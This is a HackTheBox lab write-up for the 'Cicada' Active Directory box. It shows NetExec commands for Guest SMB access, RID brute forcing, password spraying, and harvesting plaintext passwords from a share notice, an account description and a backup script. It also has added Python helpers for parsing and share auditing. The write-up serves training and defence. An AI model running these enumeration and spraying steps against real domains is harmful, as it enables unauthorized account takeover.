Cicada – HackTheBox

  • OS: Cicada
  • Difficulty: Easy
  • Platform: HackTheBox



Summary

“Cicada” is an easy box from the HackTheBox platform. The machine allows a Guest session over SMB, which exposes a share containing a default password for new hires. We obtain usernames through RID brute forcing and find one user who still has the default password from the leaked file. With this user we can enumerate the domain users, one of whom has their own password stored in the account description. That second user can read another share, where a script leaks credentials for a third user. The third user can connect to the victim machine through WinRM, giving us a shell. Once inside, we see that this user has SeBackupPrivilege enabled, which allows us to save copies of the SAM and SYSTEM hives, dump the credentials stored in them and obtain the Administrator user's NT hash. We use this hash in a Pass The Hash attack to impersonate Administrator, taking full control of the victim machine.


User

We start looking for open TCP ports with a quick Nmap scan:

❯ sudo nmap -sS -p- --open --min-rate=5000 -n -Pn -vvv 10.10.11.35

Scanned at 2025-02-13 20:28:36 -03 for 58s
Not shown: 65522 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
63480/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 58.59 seconds
           Raw packets sent: 262138 (11.534MB) | Rcvd: 75 (3.300KB)

We can see multiple open ports: 53 Domain Name System (DNS), 88 Kerberos, 135 Microsoft RPC, 389 Lightweight Directory Access Protocol (LDAP), 445 Server Message Block (SMB) and 5985 Windows Remote Management (WinRM), among others.

We then run a service/version and default-script scan with Nmap against these ports using the -sVC flags:

❯ sudo nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,63480 10.10.11.35

Nmap scan report for 10.10.11.35
Host is up (0.42s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-14 06:32:21Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
63480/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-02-14T06:33:17
|_  start_date: N/A
|_clock-skew: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.68 seconds

The open ports indicate we are up against a machine in an Active Directory environment.

Note
Throughout this writeup I will show how NetExec works as a “swiss army knife” and how the whole intrusion can be carried out using only this tool.

We start using NetExec against SMB service in the target machine:

❯ nxc smb 10.10.11.35

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)

We get the domain cicada.htb, the machine name CICADA-DC and the FQDN (machine name plus domain) CICADA-DC.cicada.htb.

We add the domain, machine name and FQDN to our /etc/hosts file to avoid name-resolution problems later on if we need to use LDAP or Kerberos:

❯ echo '10.10.11.35 CICADA-DC CICADA-DC.cicada.htb cicada.htb' | sudo tee -a /etc/hosts

The machine apparently allows a NULL session (we provide no user and no password):

❯ nxc smb 10.10.11.35 -u '' -p ''

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\:

The [+] marker suggests the login was accepted.

However, this is a false positive. When we try to enumerate the available shares using NetExec with the --shares flag, we get STATUS_ACCESS_DENIED:

❯ nxc smb 10.10.11.35 -u '' -p '' --shares

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\:
SMB         10.10.11.35     445    CICADA-DC        [-] Error enumerating shares: STATUS_ACCESS_DENIED

Nevertheless, we can check whether the machine allows Guest sessions by passing an arbitrary username with an empty password:

❯ nxc smb 10.10.11.35 -u 'a' -p '' --shares

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\a: (Guest)
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV
SMB         10.10.11.35     445    CICADA-DC        HR              READ
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON                        Logon server share
SMB         10.10.11.35     445    CICADA-DC        SYSVOL                          Logon server share

We provided a random username, a, with no password and we are allowed to enumerate shares. Among them is a share we are allowed to read, called HR.

We can check its content using NetExec's spidering feature (listing files that match a pattern). We pass the --spider flag with the share we want to spider, and a --pattern with the text that must appear in the file name (for example, --pattern txt would list files such as test.txt or filetxt.pdf). To list every file we use a single dot (.), which as a regular expression matches anything:

❯ nxc smb 10.10.11.35 -u 'a' -p '' --spider 'HR' --pattern .

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\a: (Guest)
SMB         10.10.11.35     445    CICADA-DC        [*] Started spidering
SMB         10.10.11.35     445    CICADA-DC        [*] Spidering .
SMB         10.10.11.35     445    CICADA-DC        //10.10.11.35/HR/. [dir]
SMB         10.10.11.35     445    CICADA-DC        //10.10.11.35/HR/.. [dir]
SMB         10.10.11.35     445    CICADA-DC        //10.10.11.35/HR/Notice from HR.txt [lastm:'2024-08-28 13:31' size:1266]
SMB         10.10.11.35     445    CICADA-DC        [*] Done spidering (Completed in 1.4311010837554932)

There is a Notice from HR.txt file at HR share.

We could download this file right away, but NetExec first offers a really useful option: checking whether the word password appears inside the files of a share. We want to see every file in which that word is stored. For that, along with --spider, we add --content to tell NetExec to inspect file contents, followed by --regex with the regular expression to search for. Since we want the word password, case insensitive, we use --content --regex '(?i)password' against the HR share:

❯ nxc smb 10.10.11.35 -u 'a' -p '' --spider 'HR' --content --regex '(?i)password'

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\a: (Guest)
SMB         10.10.11.35     445    CICADA-DC        [*] Started spidering
SMB         10.10.11.35     445    CICADA-DC        [*] Spidering .
SMB         10.10.11.35     445    CICADA-DC        //10.10.11.35/HR/Notice from HR.txt [lastm:'2024-08-28 13:31' size:1266 offset:1266 regex:'b'(?i)password'']
SMB         10.10.11.35     445    CICADA-DC        [*] Done spidering (Completed in 2.866698741912842)

We can see that the file //10.10.11.35/HR/Notice from HR.txt contains the word password. This is really useful when a share holds many files, as it saves checking them one by one.

Now that we have a target file, we can download it using NetExec with the --share flag together with --get-file. We download Notice from HR.txt from the HR share and save it on our attacker machine as leaked_file.txt:

❯ nxc smb 10.10.11.35 -u 'a' -p '' --share 'HR' --get-file 'Notice from HR.txt' leaked_file.txt

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\a: (Guest)
SMB         10.10.11.35     445    CICADA-DC        [*] Copying "Notice from HR.txt" to "leaked_file.txt"
SMB         10.10.11.35     445    CICADA-DC        [+] File "Notice from HR.txt" was downloaded to "leaked_file.txt"

We have downloaded the file as leaked_file.txt in our attacker machine.

Once downloaded, we read the file with cat on our attacker machine:

❯ cat leaked_file.txt

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

where the key line is:

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

We have a potential password, Cicada$M6Corpb*@Lp#nZp!8, but no usernames. We can try the --users flag to list domain users through our guest session:

❯ nxc smb 10.10.11.35 -u 'a' -p '' --users

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\a: (Guest)

We get no output, so the guest session is probably not allowed to enumerate users this way.

Another option to obtain users is --rid-brute. The RID (Relative Identifier) is the last component of an object's security identifier (SID); it is assigned when the object is created in Active Directory, so every user and every group gets its own RID. With --rid-brute, NetExec asks the server to resolve SIDs built from RID values up to 4000 (the default) and reports the user or group name behind each one that exists. We brute force users by running:

❯ nxc smb 10.10.11.35 -u 'a' -p '' --rid-brute

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\a: (Guest)
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
<SNIP>
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

This worked!

To keep only users, note that the output shows SidTypeUser for users and SidTypeGroup for groups. So we filter on the SidTypeUser string with grep and extract the username column with awk:

❯ nxc smb 10.10.11.35 -u 'a' -p '' --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | awk -F '\' '{print $2}'

Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

Let’s save these users into a file called domain_users.txt:

❯ nxc smb 10.10.11.35 -u 'a' -p '' --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | awk -F '\' '{print $2}' > domain_users.txt
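The grep/awk pipeline above prints only the first word of field 6, so it would truncate any account name containing a space; as an added example that is not part of the original writeup, here is a Python parser for NetExec --rid-brute output that keeps whole names, separates users from groups, and tells site-created objects (RID 1000 and up) from the well-known built-in ones seen above. The sample output is constructed from the lines shown in this writeup.

```python
import re
from collections import defaultdict

# Payload format of each NetExec --rid-brute result line, after the usual
# "SMB  <ip>  445  <host>" prefix:  "<RID>: <DOMAIN>\<Name> (SidType<Kind>)".
# The name is captured lazily up to the final "(SidType...)" so names with
# spaces ("Dev Support", "Enterprise Read-only Domain Controllers") stay whole.
RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<type>SidType\w+)\)\s*$"
)

# RIDs fixed by Windows for every domain; everything from 1000 upwards is site-created.
WELL_KNOWN_RIDS = {
    498: "Enterprise Read-only Domain Controllers",
    500: "built-in Administrator",
    501: "built-in Guest",
    502: "krbtgt (KDC service account)",
    512: "Domain Admins",
}

def parse_rid_brute(output: str) -> list:
    """Turn raw nxc --rid-brute output into records; banner and <SNIP> lines are ignored."""
    records = []
    for line in output.splitlines():
        m = RID_LINE.search(line)
        if m:
            records.append({"rid": int(m["rid"]), "domain": m["domain"],
                            "name": m["name"], "type": m["type"]})
    return records

def user_list(output: str) -> list:
    """Same result the grep/awk pipeline aims for, but safe for names containing spaces."""
    return [r["name"] for r in parse_rid_brute(output) if r["type"] == "SidTypeUser"]

def split_by_type(records: list) -> dict:
    """Group names by SID type (SidTypeUser, SidTypeGroup, SidTypeAlias, ...)."""
    by_type = defaultdict(list)
    for r in records:
        by_type[r["type"]].append(r["name"])
    return dict(by_type)

def site_created(records: list) -> list:
    """Objects an administrator created (RID >= 1000): the interesting ones for a review."""
    return [r for r in records if r["rid"] >= 1000]

def annotate_well_known(records: list) -> dict:
    """Map the well-known RIDs seen in the output to what they are."""
    return {r["name"]: WELL_KNOWN_RIDS[r["rid"]] for r in records if r["rid"] in WELL_KNOWN_RIDS}

# Constructed sample: the result lines shown in the writeup above, prefix and <SNIP> included.
SAMPLE_OUTPUT = r"""SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\a: (Guest)
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
<SNIP>
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)
"""

if __name__ == "__main__":
    recs = parse_rid_brute(SAMPLE_OUTPUT)
    print("users:", user_list(SAMPLE_OUTPUT))
    print("by type:", split_by_type(recs))
    print("site-created:", [(r["rid"], r["name"]) for r in site_created(recs)])
```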

We have a list of users and a potential password, so we can attempt a Password Spray (one password tried against many users) to see whether anyone has not changed the default password. We pass the list we just created as the -u (user) argument and the default password from the leaked file as -p. We also add --continue-on-success, since the password could be valid for more than one user and we do not want NetExec to stop at the first match. We run:

❯ nxc smb 10.10.11.35 -u domain_users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

The password matches for the user michael.wrightson, so we have valid credentials: michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8.

Let’s check which shares this user can read:

❯ nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV
SMB         10.10.11.35     445    CICADA-DC        HR              READ
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share

NETLOGON and SYSVOL are now readable, but there is no new share of interest.

Now that we have a valid user, we can try the --users flag again in NetExec, since an authenticated domain user should be able to read account descriptions:

❯ nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.10.11.35     445    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.10.11.35     445    CICADA-DC        Administrator                 2024-08-26 20:08:03 1       Built-in account for administering the computer/domain
SMB         10.10.11.35     445    CICADA-DC        Guest                         2024-08-28 17:26:56 1       Built-in account for guest access to the computer/domain
SMB         10.10.11.35     445    CICADA-DC        krbtgt                        2024-03-14 11:14:10 1       Key Distribution Center Service Account
SMB         10.10.11.35     445    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 1
SMB         10.10.11.35     445    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 1
SMB         10.10.11.35     445    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0
SMB         10.10.11.35     445    CICADA-DC        david.orelious                2024-03-14 12:17:29 1       Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB         10.10.11.35     445    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 1
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated 8 local users: CICADA

We have an interesting description for the user david.orelious that says:

Just in case I forget my password is aRt$Lp#7t*VQ!3

Well, thank you.

We can check if these new credentials are correct (user david.orelious and password aRt$Lp#7t*VQ!3):

❯ nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3'

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3

Credentials are correct. We have a new user.

We check whether this user has any new shares available that we can inspect:

❯ nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV             READ
SMB         10.10.11.35     445    CICADA-DC        HR              READ
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share

We can read DEV share. That’s a new one.

As before, we can inspect it using the --spider and --pattern flags with NetExec:

❯ nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --spider DEV --pattern .

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB         10.10.11.35     445    CICADA-DC        [*] Started spidering
SMB         10.10.11.35     445    CICADA-DC        [*] Spidering .
SMB         10.10.11.35     445    CICADA-DC        //10.10.11.35/DEV/. [dir]
SMB         10.10.11.35     445    CICADA-DC        //10.10.11.35/DEV/.. [dir]
SMB         10.10.11.35     445    CICADA-DC        //10.10.11.35/DEV/Backup_script.ps1 [lastm:'2024-08-28 13:28' size:601]
SMB         10.10.11.35     445    CICADA-DC        [*] Done spidering (Completed in 1.4138860702514648)

We have a file called Backup_script.ps1 which seems interesting.

We can then download this file using NetExec:

❯ nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --share DEV --get-file 'Backup_script.ps1' 'Backup_script.ps1'

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB         10.10.11.35     445    CICADA-DC        [*] Copying "Backup_script.ps1" to "Backup_script.ps1"
SMB         10.10.11.35     445    CICADA-DC        [+] File "Backup_script.ps1" was downloaded to "Backup_script.ps1"

Once we have downloaded the file, we check its content. It is a PowerShell script:

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

In summary, the script compresses the directory C:\smb into a zip file stored under D:\Backup, using the current time as a stamp in the file name. The important part of the script, however, is:

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force

We have a new plaintext password for the user emily.oscars. As we saw when we dumped the domain users, this account exists in the domain. We check whether the credentials are valid:

❯ nxc smb 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt

They are valid.
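Both credential leaks on this box (a default password written out in a text file on HR, and a plaintext secret passed to ConvertTo-SecureString in a script on DEV) are exactly what a periodic share audit catches before a Guest session does. As an added example that is not part of the original writeup, the following Python mirrors what --spider --content --regex does over downloaded files, trying stricter patterns first and masking any captured secret in the report; the sample files are constructed from the two excerpts quoted above plus one harmless file.

```python
import re
from dataclasses import dataclass

# Rules are tried in this order; the first one that matches a line wins, so a
# line with a recoverable secret is reported as such rather than as a bare mention.
RULES = [
    # PowerShell secret handed to ConvertTo-SecureString as plain text (Backup_script.ps1 style)
    ("ps-plaintext-securestring",
     re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.IGNORECASE)),
    # "password is: <value>" sentence (Notice from HR.txt style)
    ("password-assignment", re.compile(r"\bpassword\s+is\s*:\s*(\S+)", re.IGNORECASE)),
    # any other mention, equivalent to NetExec's --regex '(?i)password'
    ("password-mention", re.compile(r"\bpassword\b", re.IGNORECASE)),
]
SEVERITY = {"ps-plaintext-securestring": 3, "password-assignment": 2, "password-mention": 1}

@dataclass
class Finding:
    path: str
    line_no: int
    rule: str
    evidence: str  # the matching line, with any captured secret value masked

def mask(value: str) -> str:
    """Keep the first two characters so the hit is recognisable, hide the rest."""
    return value[:2] + "*" * max(len(value) - 2, 0)

def audit_file(path: str, data: bytes) -> list:
    """Scan one downloaded file; binary junk is tolerated via errors='replace'."""
    findings = []
    for line_no, line in enumerate(data.decode("utf-8", errors="replace").splitlines(), 1):
        for rule, rx in RULES:
            m = rx.search(line)
            if not m:
                continue
            evidence = line.strip()
            if m.groups():  # the rule captured the secret itself: never echo it in a report
                evidence = evidence.replace(m.group(1), mask(m.group(1)))
            findings.append(Finding(path, line_no, rule, evidence))
            break
    return findings

def audit_share(files: dict) -> list:
    """files maps share-relative path -> raw bytes, as pulled with --get-file."""
    out = []
    for path, data in files.items():
        out.extend(audit_file(path, data))
    return out

def summarize(findings: list) -> dict:
    """Worst rule per file: a quick triage list of what to clean up first."""
    worst = {}
    for f in findings:
        if f.path not in worst or SEVERITY[f.rule] > SEVERITY[worst[f.path]]:
            worst[f.path] = f.rule
    return worst

# Constructed sample share contents, taken from the two excerpts quoted in this writeup,
# plus one harmless file to show that clean files produce no findings.
SAMPLE_FILES = {
    "HR/Notice from HR.txt": b"""Dear new hire!

Welcome to Cicada Corp! As part of our security protocols, it's essential that you change your default password.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

Remember, your password is a crucial aspect of keeping your account secure.
""",
    "DEV/Backup_script.ps1": b"""$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
""",
    "DEV/README.md": b"# DEV share\nScripts for the backup job live here.\n",
}

if __name__ == "__main__":
    for f in audit_share(SAMPLE_FILES):
        print(f"{f.path}:{f.line_no} [{f.rule}] {f.evidence}")
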